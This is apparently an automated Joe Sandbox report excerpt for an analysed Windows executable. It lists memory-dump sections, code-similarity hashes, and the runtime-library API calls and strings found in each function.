                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction ID: 405a8a5d5e02646b90e43f1e3faac176237b74da9f324872e234f4bdb685bbe3
                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction Fuzzy Hash: E711BF36E18A13C3F65C3928F5D637982606F54364FF506B4F96F066E69F2CA8429A30
                                                                                                    APIs
                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6BF
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6DE
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA706
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA717
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA728
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                    • Instruction ID: dd1ff62f630595b6a1cc1e96c42a5fd051ec86a089b1ff38ba40a3f1b78b23b4
                                                                                                    • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                    • Instruction Fuzzy Hash: A7113D21B0C242C2FA5C7B25B551579E1B35F983B0EF84334E83E466EEDE2DA9428761
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                    • Instruction ID: 795eb78e52bd79cd74cd2637bde607f4aa409ca3a859816f0aa11aec20b55fc2
                                                                                                    • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                    • Instruction Fuzzy Hash: 5711FA20F48207C2FA6C7F25B451579E2A34F59370EF84734D93E0A2DAED2CB6414271
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: verbose
                                                                                                    • API String ID: 3215553584-579935070
                                                                                                    • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                    • Instruction ID: 4a0b4dc2d2050787467cca40af6be64adb799304cdf4baca05cb52d3f47d8e20
                                                                                                    • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                    • Instruction Fuzzy Hash: E591B022A0C646C1F76AAF25F45037DB6B2AB04B95FE84136DA5D873D9EE3CE4458320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                    • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                    • Instruction ID: 6bd6da0e4784cef727a130e93b34c6c758fbe33866e409389363374781674e55
                                                                                                    • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                    • Instruction Fuzzy Hash: E481A37AE08203C5F76C7E29E110278B6B3AB11744FF58035DA1A973EDDB2DE905A721
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E
                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133041C3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort
                                                                                                    • String ID: $csm$csm
                                                                                                    • API String ID: 4206212132-1512788406
                                                                                                    • Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                                                                    • Instruction ID: 14df9676fac50ec4151e1d24cfdfbf85645f10e7f67e0b0115b422b790d0cd56
                                                                                                    • Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                                                                    • Instruction Fuzzy Hash: 7371A332A08A818AD7648F16D4407BD7BA0FB64FA8F048175DFAC27AA9CB3CD551CB44
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                    • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                    • Instruction ID: 7ef9ab6b6f7882665af7288478547980de27fb17c7de2eb67ba06ad4590e9d90
                                                                                                    • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                    • Instruction Fuzzy Hash: CC518F32B19642CADF18EF25F444A79B7A1EB44B98FA08131DA5A43B85EF7DEC41C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                    • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                    • Instruction ID: 4f38563176fc62fbed1f6174cea3b9c63a93e835aa5724d0496b833194f72920
                                                                                                    • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                    • Instruction Fuzzy Hash: 21618E32908B85C6EB25AF25F4403AAB7B4FB84784F544225EB9C43B95DF7CE594CB10
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                    • String ID: csm$csm
                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                    • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                    • Instruction ID: 65391e38177a33de5bf5207e9f817f474d889efe7845a00e2f09b942252b0d89
                                                                                                    • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                    • Instruction Fuzzy Hash: 2B51A136A08642CAEB68AF61A048378B7B0EB54B94FA44536DA5D43FD1CF3CED50CB51
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E
                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13303F13
                                                                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13303F23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                    • String ID: csm$csm
                                                                                                    • API String ID: 4108983575-3733052814
                                                                                                    • Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                                                                    • Instruction ID: 5b87596cc6666b00ccef6c2f01896475db51f894c5a467b797d29cd1a8b79bb3
                                                                                                    • Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                                                                    • Instruction Fuzzy Hash: AB518432908A428AEB648F17954436D77A0FB60BB4F144276DBAD67BE5CF3CE550C708
                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF7691A324C,?,?,00007FF7691A3964), ref: 00007FF7691A7642
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory
                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                    • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                    • Instruction ID: f81caa457b8c00a6ea6cdb965cf09d026ac504dd434ae85c9ba9068ab4a59568
                                                                                                    • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                    • Instruction Fuzzy Hash: 0F31B821B19AC5C9FA25AF15F8107A6A274FB44BE0FE44231EA6D43BC9DE2CDA458710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameName::
                                                                                                    • String ID: %lf
                                                                                                    • API String ID: 1333004437-2891890143
                                                                                                    • Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                                                                    • Instruction ID: f5e6b3e118acf544ae5d8f87259f807cbd1e3de19d6e1f260b6e3da0b8e70eb2
                                                                                                    • Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                                                                    • Instruction Fuzzy Hash: 5631D93290CE8189FA60CB66F85027E7760FB65BA4F4482B1E9BD67666CF3CD502C704
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                    • String ID: Error$Error/warning (ANSI fallback)
                                                                                                    • API String ID: 1878133881-653037927
                                                                                                    • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                    • Instruction ID: 0c7488aba16d5498f09aaa62c641d4c9b372210183e5b25577ab8129fa3ad34a
                                                                                                    • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                    • Instruction Fuzzy Hash: 21115B72628A85C1EB28AF11F451BA9B378FB44B84FE05136DA5D47A44DF3CDA09CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                    • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                    • API String ID: 1878133881-2698358428
                                                                                                    • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                    • Instruction ID: 9d207bdff46f80c24b73023a51e38733ac9079c85033961b2fa41e774263a076
                                                                                                    • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                    • Instruction Fuzzy Hash: 6A115872628A85C1EB28AF11F451BA9B378FB44B84FE05136DA9D47A44DF3CDA09CB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E
                                                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330243E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abortterminate
                                                                                                    • String ID: MOC$RCC$csm
                                                                                                    • API String ID: 661698970-2671469338
                                                                                                    • Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                                                                    • Instruction ID: 9e10e85b0756940293677bfbf6226450e051ab89da82817758c40d7f994ea109
                                                                                                    • Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                                                                    • Instruction Fuzzy Hash: 09F0AF36908A42CAEB505F2AE18006C3260FB68B60F1850B1E76C57276CF3CD4D0D705
                                                                                                    APIs
                                                                                                    • __C_specific_handler.LIBVCRUNTIME ref: 00007FFE1330E9F0
                                                                                                      • Part of subcall function 00007FFE1330EC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1330ECF0
                                                                                                      • Part of subcall function 00007FFE1330EC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1330E9F5), ref: 00007FFE1330ED3F
                                                                                                      • Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E
                                                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330EA1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2451123448-629598281
                                                                                                    • Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                                                                    • Instruction ID: 6d73ed30cecdeb63da5884826d499ef1ed45acc4e0ef9564a7c579fd3de88bbb
                                                                                                    • Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                                                                    • Instruction Fuzzy Hash: DDE0E531E18E4284E7206B66B18013C27A0FF38B70F1480B8DA6C2766ACE3CE4A08209
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718003287-0
                                                                                                    • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                    • Instruction ID: f174d3c389e2c0b0b2f8f5f514f608d6f383f6626e70715dcb2cd3081e8b72ff
                                                                                                    • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
